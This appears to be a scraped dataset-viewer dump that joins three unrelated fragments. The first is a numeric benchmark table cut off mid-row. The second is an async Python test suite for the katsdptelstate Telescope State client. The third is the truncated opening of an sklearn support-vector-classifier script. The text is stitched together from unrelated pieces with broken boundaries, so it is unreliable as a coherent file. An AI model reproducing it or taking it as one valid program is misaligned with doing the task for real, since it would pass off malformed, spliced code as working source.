input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
0.0439, 1.6589, 0.0350, 1.5733, 0.0370, 1.67e-16, 1.67e-16, 1.67e-16, nan ],
[ 180, 1.3332, 0.0489, 1.4460, 0.0451, 1.9247, 0.0339, 1.7632, 0.0370, 1.58e-16, 1.58e-16, 1.58e-16, nan ],
[ 190, 1.4496, 0.0501, 1.5773, 0.0460, 2.0851, 0.0348, 1.8676, 0.0389, 2.24e-16, 1.50e-16, 1.50e-16, nan ],
[ 200, 1.4350, 0.0560, 1.7118, 0.0470, 2.1756, 0.0370, 2.3582, 0.0341, 2.13e-16, 1.42e-16, 1.42e-16, nan ],
[ 210, 1.6091, 0.0551, 1.8868, 0.0470, 2.3981, 0.0370, 2.3377, 0.0379, 2.03e-16, 2.03e-16, 1.35e-16, nan ],
[ 220, 1.7733, 0.0548, 2.0703, 0.0470, 2.6313, 0.0370, 2.7010, 0.0360, 1.94e-16, 1.94e-16, 1.29e-16, nan ],
[ 230, 1.8965, 0.0560, 2.2173, 0.0479, 2.8031, 0.0379, 2.7176, 0.0391, 1.85e-16, 1.85e-16, 1.85e-16, nan ],
[ 240, 1.9564, 0.0591, 2.4139, 0.0479, 2.9767, 0.0389, 3.2132, 0.0360, 1.78e-16, 1.78e-16, 1.18e-16, nan ],
[ 250, 2.1225, 0.0591, 2.5066, 0.0501, 3.1332, 0.0401, 2.9244, 0.0429, 1.71e-16, 1.71e-16, 2.27e-16, nan ],
[ 260, 2.1563, 0.0629, 2.6112, 0.0520, 3.2344, 0.0420, 3.3096, 0.0410, 2.19e-16, 1.64e-16, 1.09e-16, nan ],
[ 270, 2.3607, 0.0620, 2.8682, 0.0510, 3.3911, 0.0432, 3.7426, 0.0391, 1.58e-16, 2.11e-16, 1.58e-16, nan ],
[ 280, 2.5782, 0.0610, 3.0276, 0.0520, 3.6668, 0.0429, 3.8373, 0.0410, 1.52e-16, 1.52e-16, 1.52e-16, nan ],
[ 290, 2.6815, 0.0629, 3.1888, 0.0529, 3.8474, 0.0439, 3.6680, 0.0460, 2.45e-16, 1.96e-16, 1.96e-16, nan ],
[ 300, 2.7747, 0.0651, 3.4121, 0.0529, 4.1168, 0.0439, 3.6771, 0.0491, 1.89e-16, 1.42e-16, 1.89e-16, nan ],
[ 310, 3.0177, 0.0639, 3.5163, 0.0548, 4.3954, 0.0439, 4.0037, 0.0482, 2.29e-16, 2.29e-16, 2.29e-16, nan ],
[ 320, 3.1679, 0.0648, 3.7302, 0.0551, 4.5834, 0.0448, 4.6577, 0.0441, 1.78e-16, 1.78e-16, 1.78e-16, nan ],
[ 330, 3.2608, 0.0670, 4.0365, 0.0541, 4.6512, 0.0470, 4.9798, 0.0439, 2.15e-16, 1.72e-16, 2.15e-16, nan ],
[ 340, 3.3081, 0.0701, 4.2103, 0.0551, 4.9369, 0.0470, 5.0392, 0.0460, 1.67e-16, 2.51e-16, 2.09e-16, nan ],
[ 350, 3.5052, 0.0701, 4.1722, 0.0589, 5.2312, 0.0470, 5.6936, 0.0432, 1.62e-16, 1.62e-16, 1.62e-16, nan ],
[ 360, 3.7723, 0.0689, 4.4680, 0.0582, 5.2922, 0.0491, 5.5339, 0.0470, 1.58e-16, 2.37e-16, 1.97e-16, nan ],
[ 370, 3.8641, 0.0710, 4.5695, 0.0601, 5.5096, 0.0498, 5.5898, 0.0491, 1.54e-16, 2.30e-16, 2.30e-16, nan ],
[ 380, 4.2024, 0.0689, 4.9980, 0.0579, 6.0124, 0.0482, 5.3739, 0.0539, 2.24e-16, 2.24e-16, 2.24e-16, nan ],
[ 390, 3.9119, 0.0780, 4.9968, 0.0610, 6.1205, 0.0498, 6.4933, 0.0470, 2.19e-16, 2.19e-16, 2.19e-16, nan ],
[ 400, 4.2312, 0.0758, 5.2560, 0.0610, 6.1722, 0.0520, 6.4073, 0.0501, 2.13e-16, 2.13e-16, 2.84e-16, nan ],
[ 410, 4.3096, 0.0782, 5.4368, 0.0620, 6.6365, 0.0508, 6.6054, 0.0510, 2.77e-16, 2.08e-16, 2.08e-16, nan ],
[ 420, 4.6644, 0.0758, 5.5973, 0.0632, 6.6814, 0.0529, 7.0632, 0.0501, 2.03e-16, 2.71e-16, 2.03e-16, nan ],
[ 430, 4.6408, 0.0799, 5.7794, 0.0641, 6.5049, 0.0570, 7.1315, 0.0520, 1.98e-16, 2.64e-16, 1.98e-16, nan ],
[ 440, 4.8589, 0.0799, 5.9843, 0.0648, 7.0464, 0.0551, 6.8106, 0.0570, 1.94e-16, 1.94e-16, 1.94e-16, nan ],
[ 450, 5.0073, 0.0811, 6.1684, 0.0658, 7.1233, 0.0570, 7.0936, 0.0572, 1.89e-16, 1.89e-16, 1.89e-16, nan ],
[ 460, 5.0393, 0.0842, 6.3306, 0.0670, 7.2020, 0.0589, 7.4430, 0.0570, 2.47e-16, 1.85e-16, 1.85e-16, nan ],
[ 470, 5.3362, 0.0830, 6.4930, 0.0682, 7.4878, 0.0591, 7.1423, 0.0620, 2.42e-16, 1.81e-16, 2.42e-16, nan ],
[ 480, 5.6301, 0.0820, 6.9919, 0.0660, 7.8411, 0.0589, 8.1036, 0.0570, 2.37e-16, 2.37e-16, 2.37e-16, nan ],
[ 490, 5.6062, 0.0858, 6.9834, 0.0689, 7.4199, 0.0648, 8.3054, 0.0579, 2.32e-16, 2.32e-16, 1.74e-16, nan ],
[ 500, 5.8209, 0.0861, 7.1474, 0.0701, 7.9596, 0.0629, 8.6475, 0.0579, 2.27e-16, 2.84e-16, 1.71e-16, nan ],
[ 510, 6.2107, 0.0839, 7.2389, 0.0720, 8.1270, 0.0641, 8.5397, 0.0610, 2.23e-16, 2.23e-16, 2.23e-16, nan ],
[ 520, 6.0123, 0.0901, 7.5253, 0.0720, 8.3247, 0.0651, 8.0877, 0.0670, 2.19e-16, 2.19e-16, 2.19e-16, nan ],
[ 530, 6.2621, 0.0899, 7.8172, 0.0720, 8.5228, 0.0660, 8.1689, 0.0689, 2.15e-16, 2.68e-16, 2.15e-16, nan ],
[ 540, 6.3488, 0.0920, 7.9053, 0.0739, 8.5988, 0.0679, 8.3355, 0.0701, 2.63e-16, 2.63e-16, 1.58e-16, nan ],
[ 550, 6.5859, 0.0920, 8.2005, 0.0739, 9.0469, 0.0670, 8.3077, 0.0730, 2.58e-16, 2.58e-16, 2.07e-16, nan ],
[ 560, 6.6215, 0.0949, 7.9618, 0.0789, 8.9638, 0.0701, 8.3662, 0.0751, 2.03e-16, 2.03e-16, 3.05e-16, nan ],
[ 570, 7.0006, 0.0930, 8.4528, 0.0770, 9.2865, 0.0701, 8.6950, 0.0749, 2.99e-16, 1.99e-16, 1.99e-16, nan ],
[ 580, 6.6670, 0.1011, 8.6183, 0.0782, 9.2379, 0.0730, 8.7517, 0.0770, 2.94e-16, 1.96e-16, 1.96e-16, nan ],
[ 590, 7.1168, 0.0980, 8.9450, 0.0780, 9.8155, 0.0710, 8.5030, 0.0820, 2.89e-16, 2.89e-16, 2.89e-16, nan ],
[ 600, 7.0022, 0.1030, 9.0028, 0.0801, 10.0163, 0.0720, 9.1112, 0.0792, 2.37e-16, 2.37e-16, 1.89e-16, nan ],
[ 610, 7.3739, 0.1011, 9.1152, 0.0818, 10.0855, 0.0739, 8.9842, 0.0830, 2.80e-16, 1.86e-16, 2.33e-16, nan ],
[ 620, 7.4078, 0.1040, 9.2544, 0.0832, 10.1247, 0.0761, 9.2810, 0.0830, 2.29e-16, 1.83e-16, 2.75e-16, nan ],
[ 630, 7.7914, 0.1020, 9.3672, 0.0849, 10.6201, 0.0749, 8.8454, 0.0899, 2.71e-16, 2.26e-16, 2.71e-16, nan ],
[ 640, 7.8035, 0.1051, 9.5328, 0.0861, 10.9597, 0.0749, 9.4283, 0.0870, 2.66e-16, 2.66e-16, 3.11e-16, nan ],
[ 650, 7.6999, 0.1099, 9.7250, 0.0870, 10.8552, 0.0780, 9.3166, 0.0908, 2.62e-16, 2.62e-16, 2.62e-16, nan ],
[ 660, 8.0079, 0.1090, 10.0263, 0.0870, 11.3301, 0.0770, 9.3836, 0.0930, 2.58e-16, 2.58e-16, 2.15e-16, nan ],
[ 670, 8.0240, 0.1121, 10.0034, 0.0899, 11.3936, 0.0789, 9.1758, 0.0980, 2.55e-16, 2.55e-16, 2.55e-16, nan ],
[ 680, 7.9766, 0.1161, 10.3040, 0.0899, 11.5958, 0.0799, 9.5445, 0.0970, 2.51e-16, 2.51e-16, 2.51e-16, nan ],
[ 690, 8.5279, 0.1118, 10.4702, 0.0911, 11.7635, 0.0811, 9.6376, 0.0989, 3.30e-16, 3.30e-16, 2.47e-16, nan ],
[ 700, 8.4523, 0.1161, 10.5546, 0.0930, 11.9660, 0.0820, 9.6175, 0.1020, 2.44e-16, 2.44e-16, 3.25e-16, nan ],
[ 710, 8.6245, 0.1171, 10.7479, 0.0939, 12.1685, 0.0830, 9.7125, 0.1040, 2.40e-16, 2.40e-16, 2.40e-16, nan ],
[ 720, 8.8871, 0.1168, 11.1373, 0.0932, 12.5135, 0.0830, 9.6987, 0.1070, 2.37e-16, 2.37e-16, 2.37e-16, nan ],
[ 730, 8.8818, 0.1202, 10.9986, 0.0970, 12.2641, 0.0870, 9.9036, 0.1078, 2.34e-16, 3.11e-16, 2.34e-16, nan ],
[ 740, 9.2925, 0.1180, 11.5573, 0.0949, 12.9208, 0.0849, 10.0433, 0.1092, 3.07e-16, 3.07e-16, 2.30e-16, nan ],
[ 750, 9.3010, 0.1211, 11.6091, 0.0970, 12.5328, 0.0899, 10.1610, 0.1109, 3.03e-16, 3.79e-16, 3.79e-16, nan ],
[ 760, 9.4759, 0.1221, 11.8045, 0.0980, 13.0071, 0.0889, 10.4336, 0.1109, 2.99e-16, 2.24e-16, 2.24e-16, nan ],
[ 770, 9.4141, 0.1261, 11.9713, 0.0992, 13.3514, 0.0889, 10.2470, 0.1159, 2.95e-16, 2.95e-16, 2.95e-16, nan ],
[ 780, 9.7337, 0.1252, 12.3137, 0.0989, 13.1030, 0.0930, 10.5148, 0.1159, 2.19e-16, 2.19e-16, 2.19e-16, nan ],
[ 790, 9.9279, 0.1259, 12.3631, 0.1011, 13.7584, 0.0908, 10.4839, 0.1192, 2.88e-16, 2.16e-16, 2.88e-16, nan ],
[ 800, 10.1615, 0.1261, 12.6779, 0.1011, 14.0718, 0.0911, 10.0101, 0.1280, 2.84e-16, 2.84e-16, 3.55e-16, nan ],
[ 810, 10.0192, 0.1311, 12.6100, 0.1042, 13.6738, 0.0961, 10.6794, 0.1230, 2.81e-16, 2.81e-16, 2.11e-16, nan ],
[ 820, 10.3622, 0.1299, 13.0726, 0.1030, 14.3334, 0.0939, 10.9445, 0.1230, 2.77e-16, 2.77e-16, 2.77e-16, nan ],
[ 830, 10.4438, 0.1321, 13.0312, 0.1059, 14.2159, 0.0970, 10.3690, 0.1330, 2.74e-16, 2.74e-16, 2.74e-16, nan ],
[ 840, 10.4516, 0.1352, 13.4683, 0.1049, 14.7048, 0.0961, 10.7943, 0.1309, 2.71e-16, 3.38e-16, 2.71e-16, nan ],
[ 850, 10.7970, 0.1340, 13.6357, 0.1061, 14.9088, 0.0970, 10.7207, 0.1349, 2.67e-16, 2.67e-16, 2.67e-16, nan ],
[ 860, 11.0327, 0.1342, 13.8339, 0.1070, 15.2615, 0.0970, 11.0524, 0.1340, 2.64e-16, 2.64e-16, 2.64e-16, nan ],
[ 870, 11.1520, 0.1359, 14.0323, 0.1080, 15.4663, 0.0980, 10.7557, 0.1409, 3.27e-16, 3.27e-16, 3.92e-16, nan ],
[ 880, 11.1553, 0.1390, 14.3566, 0.1080, 15.6711, 0.0989, 10.8573, 0.1428, 3.23e-16, 2.58e-16, 2.58e-16, nan ],
[ 890, 11.5890, 0.1369, 14.4297, 0.1099, 15.8383, 0.1001, 11.3131, 0.1402, 3.19e-16, 2.55e-16, 2.55e-16, nan ],
[ 900, 11.2621, 0.1440, 14.4730, 0.1121, 16.0811, 0.1009, 11.4325, 0.1419, 2.53e-16, 2.53e-16, 2.53e-16, nan ],
[ 1000, 12.8394, 0.1559, 16.8276, 0.1190, 17.7152, 0.1130, 11.5661, 0.1731, 2.84e-16, 2.84e-16, 2.84e-16, nan ],
[ 1100, 14.2289, 0.1702, 18.9542, 0.1278, 12.0515, 0.2010, 12.6676, 0.1912, 3.10e-16, 3.10e-16, 3.10e-16, nan ],
[ 1200, 15.7623, 0.1829, 21.0621, 0.1369, 13.0982, 0.2201, 12.9857, 0.2220, 3.32e-16, 2.84e-16, 2.84e-16, nan ],
[ 1300, 17.1556, 0.1972, 22.8465, 0.1481, 13.9780, 0.2420, 13.9780, 0.2420, 3.50e-16, 2.62e-16, 3.06e-16, nan ],
[ 1400, 18.7610, 0.2091, 25.3129, 0.1550, 15.3198, 0.2561, 13.9082, 0.2820, 3.25e-16, 3.25e-16, 3.25e-16, nan ],
[ 1500, 19.8392, 0.2270, 26.4894, 0.1700, 15.9653, 0.2820, 14.4396, 0.3119, 3.79e-16, 3.03e-16, 3.79e-16, nan ],
[ 1600, 20.6618, 0.2480, 28.1629, 0.1819, 16.4787, 0.3109, 13.7745, 0.3719, 3.55e-16, 3.55e-16, 3.55e-16, nan ],
[ 1700, 22.0722, 0.2620, 29.9473, 0.1931, 17.1067, 0.3381, 14.4217, 0.4010, 3.34e-16, 3.34e-16, 4.01e-16, nan ],
[ 1800, 23.6677, 0.2739, 31.6212, 0.2050, 18.2634, 0.3550, 18.0213, 0.3598, 3.79e-16, 3.79e-16, 3.79e-16, nan ],
[ 1900, 24.8148, 0.2911, 33.5907, 0.2151, 19.3232, 0.3738, 16.2373, 0.4449, 3.59e-16, 3.59e-16, 2.99e-16, nan ],
[ 2000, 25.9839, 0.3080, 34.6452, 0.2310, 20.3709, 0.3929, 18.1172, 0.4418, 3.98e-16, 4.55e-16, 3.41e-16, nan ],
[ 2100, 27.2343, 0.3240, 36.0383, 0.2449, 15.1873, 0.5810, 18.2232, 0.4842, 4.33e-16, 3.25e-16, 3.25e-16, nan ],
[ 2200, 28.7265, 0.3371, 37.6803, 0.2570, 16.2218, 0.5970, 18.1986, 0.5322, 5.17e-16, 3.62e-16, 3.62e-16, nan ],
[ 2300, 30.1597, 0.3510, 39.4974, 0.2680, 16.6711, 0.6349, 19.4204, 0.5450, 3.95e-16, 4.45e-16, 3.95e-16, nan ],
[ 2400, 31.6766, 0.3638, 40.5865, 0.2840, 17.5649, 0.6561, 18.2409, 0.6318, 4.26e-16, 4.26e-16, 3.79e-16, nan ],
[ 2500, 32.7402, 0.3819, 41.8260, 0.2990, 18.1739, 0.6881, 18.8600, 0.6630, 4.55e-16, 4.09e-16, 4.09e-16, nan ],
[ 2600, 33.6470, 0.4020, 43.7722, 0.3090, 18.8155, 0.7188, 20.0314, 0.6752, 5.25e-16, 3.94e-16, 4.81e-16, nan ],
[ 2700, 34.9775, 0.4170, 45.0152, 0.3240, 19.4517, 0.7498, 19.8172, 0.7360, 4.21e-16, | |
<gh_stars>0
################################################################################
# Copyright (c) 2015-2019, National Research Foundation (Square Kilometre Array)
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use
# this file except in compliance with the License. You may obtain a copy
# of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
"""Tests for the asynchronous Telescope State client."""
import asyncio
from unittest import mock
import asynctest
import async_timeout
import numpy as np
import fakeredis.aioredis
import katsdptelstate
from katsdptelstate import ImmutableKeyError, encode_value, KeyType, ENCODING_MSGPACK
from katsdptelstate.aio import TelescopeState
from katsdptelstate.aio.memory import MemoryBackend
from katsdptelstate.aio.redis import RedisBackend
class TestTelescopeState(asynctest.TestCase):
async def setUp(self) -> None:
self.ts = await self.make_telescope_state()
self.ns = self.ts.view('ns')
async def tearDown(self) -> None:
self.ts.backend.close()
await self.ts.backend.wait_closed()
async def make_telescope_state(self) -> TelescopeState:
return TelescopeState()
def test_bad_construct(self) -> None:
with self.assertRaises(ValueError):
TelescopeState(self.ts.backend, base=self.ts)
def test_namespace(self) -> None:
self.assertEqual(self.ts.prefixes, ('',))
self.assertEqual(self.ns.prefixes, ('ns_', ''))
ns2 = self.ns.view(b'ns_child_grandchild')
self.assertEqual(ns2.prefixes, ('ns_child_grandchild_', 'ns_', ''))
self.assertEqual(ns2.root().prefixes, ('',))
ns_excl = self.ns.view('exclusive', exclusive=True)
self.assertEqual(ns_excl.prefixes, ('exclusive_',))
async def test_basic_add(self) -> None:
await self.ts.add('test_key', 1234.5)
self.assertEqual(await self.ts['test_key'], 1234.5)
await self.ts.delete('test_key')
with self.assertRaises(KeyError):
await self.ts['test_key']
async def test_namespace_add(self) -> None:
await self.ns.add('test_key', 1234.5)
self.assertEqual(await self.ns['test_key'], 1234.5)
self.assertEqual(await self.ts[self.ts.join('ns', 'test_key')], 1234.5)
with self.assertRaises(KeyError):
await self.ts['test_key']
async def test_delete(self) -> None:
await self.ts.add('test_key', 1234.5)
self.assertTrue(await self.ts.exists('test_key'))
await self.ts.delete('test_key')
await self.ts.delete('test_key')
self.assertFalse(await self.ts.exists('test_key'))
async def test_namespace_delete(self) -> None:
await self.ts.add('parent_key', 1234.5)
await self.ns.add('child_key', 2345.6)
await self.ns.delete('child_key')
await self.ns.delete('parent_key')
self.assertEqual(await self.ts.keys(), [])
async def test_clear(self) -> None:
await self.ts.add('test_key', 1234.5)
await self.ts.add('test_key_rt', 2345.6)
await self.ts.clear()
self.assertEqual(await self.ts.keys(), [])
async def test_get_default(self) -> None:
self.assertIsNone(await self.ts.get('foo'))
self.assertEqual(await self.ts.get('foo', 'bar'), 'bar')
async def test_get_return_encoded(self) -> None:
for immutable in [True, False]:
x = np.array([(1.0, 2), (3.0, 4)], dtype=[('x', float), ('y', int)])
await self.ts.add('test_key_rt', x, immutable=True)
x_decoded = await self.ts.get('test_key_rt')
self.assertTrue((x_decoded == x).all())
x_encoded = await self.ts.get('test_key_rt', return_encoded=True)
self.assertEqual(x_encoded, encode_value(x))
await self.ts.delete('test_key_rt')
async def test_get_range_return_encoded(self) -> None:
test_values = ['Test Value: {}'.format(x) for x in range(5)]
for i, test_value in enumerate(test_values):
await self.ts.add('test_key', test_value, i)
stored_values = await self.ts.get_range('test_key', st=0)
self.assertEqual(stored_values[2][0], test_values[2])
stored_values_pickled = await self.ts.get_range('test_key', st=0, return_encoded=True)
self.assertEqual(stored_values_pickled[2][0], encode_value(test_values[2]))
# check timestamp
self.assertEqual(stored_values_pickled[2][1], 2)
async def test_immutable(self) -> None:
await self.ts.add('test_immutable', 1234.5, immutable=True)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_immutable', 1234.5)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_immutable', 5432.1, immutable=True)
with self.assertRaises(ImmutableKeyError):
await self.ts.set_indexed('test_immutable', 1234.5, 1234.5)
async def test_immutable_same_value(self) -> None:
await self.ts.add('test_immutable', 1234.5, immutable=True)
await self.ts.add('test_mutable', 1234.5)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_mutable', 2345.6, immutable=True)
async def test_immutable_same_value_str(self) -> None:
with mock.patch('katsdptelstate.encoding._allow_pickle', True), \
mock.patch('katsdptelstate.encoding._warn_on_pickle', False):
await self.ts.add('test_bytes', b'caf\xc3\xa9', immutable=True)
await self.ts.add('test_bytes', b'caf\xc3\xa9', immutable=True)
await self.ts.add('test_bytes', 'café', immutable=True)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_bytes', b'cafe', immutable=True)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_bytes', 'cafe', immutable=True)
await self.ts.add('test_unicode', 'ümlaut', immutable=True)
await self.ts.add('test_unicode', 'ümlaut', immutable=True)
await self.ts.add('test_unicode', b'\xc3\xbcmlaut', immutable=True)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_unicode', b'umlaut', immutable=True)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_unicode', 'umlaut', immutable=True)
# Test with a binary string that isn't valid UTF-8
await self.ts.add('test_binary', b'\x00\xff', immutable=True)
await self.ts.add('test_binary', b'\x00\xff', immutable=True)
# Test Python 2/3 interop by directly injecting the pickled values
await self.ts.backend.set_immutable(b'test_2', b"S'hello'\np1\n.")
await self.ts.backend.set_immutable(b'test_3', b'Vhello\np0\n.')
await self.ts.add('test_2', 'hello', immutable=True)
await self.ts.add('test_3', 'hello', immutable=True)
# Test handling of the case where the old value cannot be decoded
# Empty string is never valid encoding
await self.ts.backend.set_immutable(b'test_failed_decode', b'')
with self.assertRaisesRegex(ImmutableKeyError, 'failed to decode the previous value'):
await self.ts.add('test_failed_decode', '', immutable=True)
async def test_immutable_none(self) -> None:
await self.ts.add('test_none', None, immutable=True)
self.assertIsNone(await self.ts.get('test_none'))
self.assertIsNone(await self.ts.get('test_none', 'not_none'))
self.assertIsNone(await self.ts['test_none'])
async def test_immutable_wrong_type(self) -> None:
await self.ts.add('test_mutable', 5)
await self.ts.add('test_indexed', 5, 5)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_mutable', 5, immutable=True)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_indexed', 5, immutable=True)
async def test_namespace_immutable(self) -> None:
await self.ts.add('parent_immutable', 1234.5, immutable=True)
await self.ns.add('child_immutable', 2345.5, immutable=True)
with self.assertRaises(KeyError):
await self.ts['child_immutable']
self.assertEqual(await self.ns.get('child_immutable'), 2345.5)
self.assertEqual(await self.ns.get('parent_immutable'), 1234.5)
async def test_key_type(self) -> None:
await self.ts.add('parent_immutable', 1, immutable=True)
await self.ns.add('child_immutable', 2, immutable=True)
await self.ts.add('parent', 3)
await self.ns.add('child', 4)
await self.ts.set_indexed('parent_indexed', 'a', 1)
await self.ns.set_indexed('child_indexed', 'b', 2)
self.assertEqual(await self.ts.key_type('parent_immutable'), KeyType.IMMUTABLE)
self.assertEqual(await self.ts.key_type('parent'), KeyType.MUTABLE)
self.assertEqual(await self.ts.key_type('parent_indexed'), KeyType.INDEXED)
self.assertEqual(await self.ts.key_type('child_immutable'), None)
self.assertEqual(await self.ts.key_type('child'), None)
self.assertEqual(await self.ts.key_type('not_a_key'), None)
self.assertEqual(await self.ns.key_type('parent_immutable'), KeyType.IMMUTABLE)
self.assertEqual(await self.ns.key_type('parent'), KeyType.MUTABLE)
self.assertEqual(await self.ns.key_type('parent_indexed'), KeyType.INDEXED)
self.assertEqual(await self.ns.key_type('child_immutable'), KeyType.IMMUTABLE)
self.assertEqual(await self.ns.key_type('child'), KeyType.MUTABLE)
self.assertEqual(await self.ns.key_type('child_indexed'), KeyType.INDEXED)
self.assertEqual(await self.ns.key_type('not_a_key'), None)
async def test_keys(self) -> None:
await self.ts.add('key1', 'a')
await self.ns.add('key2', 'b')
await self.ns.add(b'key2', 'c')
await self.ts.add(b'immutable', 'd', immutable=True)
self.assertEqual(await self.ts.keys(), ['immutable', 'key1', 'ns_key2'])
self.assertEqual(await self.ts.keys('ns_*'), ['ns_key2'])
async def test_complex_store(self) -> None:
x = np.array([(1.0, 2), (3.0, 4)], dtype=[('x', float), ('y', int)])
await self.ts.add('test_key', x)
self.assertTrue((await self.ts['test_key'] == x).all())
async def test_exists(self) -> None:
await self.ts.add('test_key', 1234.5)
self.assertTrue(await self.ts.exists('test_key'))
self.assertFalse(await self.ts.exists('nonexistent_test_key'))
async def test_time_range(self) -> None:
await self.ts.delete('test_key')
await self.ts.add('test_key', 8192, 1)
await self.ts.add('test_key', 16384, 2)
await self.ts.add('test_key', 4096, 3)
await self.ts.add('test_key', 2048, 4)
await self.ts.add('test_immutable', 12345, immutable=True)
self.assertEqual([(2048, 4)], await self.ts.get_range('test_key'))
self.assertEqual([(16384, 2)], await self.ts.get_range('test_key', et=3))
self.assertEqual([(8192, 1), (16384, 2), (4096, 3)],
await self.ts.get_range('test_key', st=2, et=4, include_previous=True))
self.assertEqual([(8192, 1), (16384, 2), (4096, 3), (2048, 4)],
await self.ts.get_range('test_key', st=0))
self.assertEqual([(8192, 1), (16384, 2), (4096, 3)],
await self.ts.get_range('test_key', st=0, et=3.5))
self.assertEqual([(8192, 1)], await self.ts.get_range('test_key', st=-1, et=1.5))
self.assertEqual([(16384, 2), (4096, 3), (2048, 4)],
await self.ts.get_range('test_key', st=2))
self.assertEqual([(8192, 1)], await self.ts.get_range('test_key', et=1.5))
self.assertEqual([], await self.ts.get_range('test_key', 3.5, 1.5))
self.assertEqual([], await self.ts.get_range('test_key', et=-0.))
self.assertEqual([(8192, 1), (16384, 2), (4096, 3), (2048, 4)],
await self.ts.get_range('test_key', st=1.5, include_previous=True))
self.assertEqual([(2048, 4)],
await self.ts.get_range('test_key', st=5, et=6, include_previous=True))
self.assertEqual([(8192, 1), (16384, 2), (4096, 3)],
await self.ts.get_range('test_key', st=2, et=4, include_previous=True))
with self.assertRaises(KeyError):
await self.ts.get_range('not_a_key')
with self.assertRaises(ImmutableKeyError):
await self.ts.get_range('test_immutable')
async def test_time_range_include_end(self) -> None:
await self.ts.add('test_key', 1234, 0)
await self.ts.add('test_key', 8192, 1)
await self.ts.add('test_key', 16384, 2)
await self.ts.add('test_key', 4096, 3)
await self.ts.add('test_key', 2048, 4)
self.assertEqual([], await self.ts.get_range('test_key', st=1.5, et=1.5, include_end=True))
self.assertEqual([(1234, 0)],
await self.ts.get_range('test_key', st=0.0, et=0.0, include_end=True))
self.assertEqual([(1234, 0)],
await self.ts.get_range('test_key', st=0.0, et=-0.0, include_end=True))
self.assertEqual([(4096, 3), (2048, 4)],
await self.ts.get_range('test_key', st=3, et=4, include_end=True))
# include_previous tests
self.assertEqual([(8192, 1), (16384, 2)],
await self.ts.get_range('test_key', et=2, include_end=True))
self.assertEqual([(8192, 1), (16384, 2), (4096, 3)],
await self.ts.get_range('test_key', st=2, et=3,
include_previous=True, include_end=True))
async def test_add_duplicate(self) -> None:
await self.ts.add('test_key', 'value', 1234.5)
await self.ts.add('test_key', 'value', 1234.5)
self.assertEqual([('value', 1234.5)], await self.ts.get_range('test_key', st=0))
async def test_wait_key_already_done_mutable(self) -> None:
"""Calling wait_key with a condition that is met must return (mutable version)."""
await self.ts.add('test_key', 123)
value, timestamp = (await self.ts.get_range('test_key'))[0]
await self.ts.wait_key('test_key', lambda v, t: v == value and t == timestamp)
async def test_wait_key_already_done_immutable(self) -> None:
"""Calling wait_key with a condition that is met must return (immutable version)."""
await self.ts.add('test_key', 123, immutable=True)
await self.ts.wait_key('test_key', lambda v, t: v == 123 and t is None)
async def test_wait_key_already_done_indexed(self) -> None:
"""Calling wait_key with a condition that is met must return (indexed version)."""
await self.ts.set_indexed('test_key', 'idx', 5)
await self.ts.wait_key('test_key', lambda v, t: v == {'idx': 5} and t is None)
async def test_wait_key_timeout(self) -> None:
"""wait_key must time out in the given time if the condition is not met"""
with self.assertRaises(asyncio.TimeoutError):
with async_timeout.timeout(0.1):
await self.ts.wait_key('test_key')
with self.assertRaises(asyncio.TimeoutError):
with async_timeout.timeout(0.1):
# Takes a different code path, even though equivalent
await self.ts.wait_key('test_key', lambda value, ts: True)
async def _set_key_immutable(self) -> None:
await asyncio.sleep(0.1)
await self.ts.set('test_key', 123)
async def _set_key_mutable(self) -> None:
await asyncio.sleep(0.1)
await self.ts.add('test_key', 123, ts=1234567890)
async def _set_key_indexed(self) -> None:
await asyncio.sleep(0.1)
await self.ts.set_indexed('test_key', 'idx', 123)
async def test_wait_key_delayed(self) -> None:
"""wait_key must succeed with a timeout that does not expire before the condition is met."""
for (set_key, value, timestamp) in [
(self._set_key_mutable, 123, 1234567890),
(self._set_key_immutable, 123, None),
(self._set_key_indexed, {'idx': 123}, None)]:
task = asyncio.ensure_future(set_key())
await self.ts.wait_key('test_key', lambda v, t: v == value and t == timestamp)
self.assertEqual(value, await self.ts.get('test_key'))
await task
await self.ts.delete('test_key')
async def test_wait_key_delayed_unconditional(self) -> None:
"""wait_key must succeed when given a timeout that does not expire before key appears."""
for set_key, value in [
(self._set_key_mutable, 123),
(self._set_key_immutable, 123),
(self._set_key_indexed, {'idx': 123})]:
task = asyncio.ensure_future(set_key())
await self.ts.wait_key('test_key')
self.assertEqual(value, await self.ts['test_key'])
await task
await self.ts.delete('test_key')
async def test_wait_key_cancel(self) -> None:
"""wait_key must deal gracefully with cancellation."""
task = asyncio.ensure_future(self.ts.wait_key('test_key'))
await asyncio.sleep(0.1)
task.cancel()
with self.assertRaises(asyncio.CancelledError):
await task
async def test_wait_key_shadow(self) -> None:
"""updates to a shadowed qualified key must be ignored"""
async def set_key(telstate):
await asyncio.sleep(0.1)
| |
"""
This code implements a support vector classifier using the sklearn package to learn a classification model for a chessboard-like dataset.
Written using Python 3.7
"""
# builtin modules
import os
import psutil
import requests
import sys
import math
# 3rd party modules
import pandas as pd
import numpy as np
import plotly.graph_objects as go
from sklearn import datasets, linear_model
from sklearn.model_selection import train_test_split
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score, cross_val_predict
from sklearn.model_selection import GridSearchCV
from sklearn import metrics
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestRegressor
#TODO: add comments to each of the sklearn functions imported above,
# as to where they are used and why
def get_data(source_file):
# Define input and output filepaths
input_path = os.path.join(os.getcwd(),'datasets','in', source_file)
# Read input data
df = pd.read_csv(input_path)
return df
def plot_inputs(df, names_in:list = ['A','B','label']):
"""
